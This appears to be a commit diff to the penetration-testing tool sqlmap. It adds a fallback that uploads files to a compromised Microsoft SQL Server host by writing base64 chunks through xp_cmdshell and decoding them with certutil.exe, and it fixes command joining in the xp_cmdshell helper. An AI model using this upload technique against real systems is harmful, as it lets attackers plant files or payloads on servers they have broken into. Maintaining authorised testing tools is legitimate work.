Merge of an Issue #1227

2024-11-22 01:26:42 +03:00 · 2015-04-22 17:21:55 +02:00 · 2015-04-22 17:21:55 +02:00 · 03f32ae2b6
commit 03f32ae2b6
parent a94dcf94e9
3 changed files with 41 additions and 2 deletions
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@ -621,6 +621,9 @@ abc abc, <biedimc(at)gmx.net>
 Abuse 007, <abuse007(at)gmail.com>
 * for reporting a bug

+agix, <florian.gaultier@gmail.com>
+* for contributing the file upload via certutil.exe functionality
+
 Alex, <m3zero(at)gmail.com>
 * for reporting a minor bug

--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -142,13 +142,13 @@ class Xp_cmdshell:
            charCounter += len(echoedLine)

            if charCounter >= maxLen:
-                self.xpCmdshellExecCmd(cmd)
+                self.xpCmdshellExecCmd(cmd.rstrip(" & "))

                cmd = ""
                charCounter = 0

        if cmd:
-            self.xpCmdshellExecCmd(cmd)
+            self.xpCmdshellExecCmd(cmd.rstrip(" & "))

    def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
        # When user provides DBMS credentials (with --dbms-cred) we need to
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@ -337,6 +337,33 @@ class Filesystem(GenericFilesystem):

        self.execCmd(complComm)

+    def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
+        infoMsg = "using certutil.exe to write the %s " % fileType
+        infoMsg += "file content to file '%s', please wait.." % dFile
+        logger.info(infoMsg)
+
+        chunkMaxSize = 500
+        dFileName = ntpath.basename(dFile)
+
+        randFile = "tmpf%s.txt" % randomStr(lowercase=True)
+        randFilePath = "%s\%s" % (tmpPath, randFile)
+
+        encodedFileContent = base64encode(wFileContent)
+
+        splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
+
+        logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
+
+        self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
+
+        logger.debug("decoding the file to %s.." % dFile)
+
+        commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
+                     "del /F /Q %s" % randFile)
+        complComm = " & ".join(command for command in commands)
+
+        self.execCmd(complComm)
+
    def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
        # NOTE: this is needed here because we use xp_cmdshell extended
        # procedure to write a file on the back-end Microsoft SQL Server
@ -371,4 +398,13 @@ class Filesystem(GenericFilesystem):
                self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)

+        if written is False:
+            message = "do you want to try to upload the file with "
+            message += "the built-in certutil.exe technique? [Y/n] "
+            choice = readInput(message, default="Y")
+
+            if not choice or choice.lower() == "y":
+                self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
+                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+
        return written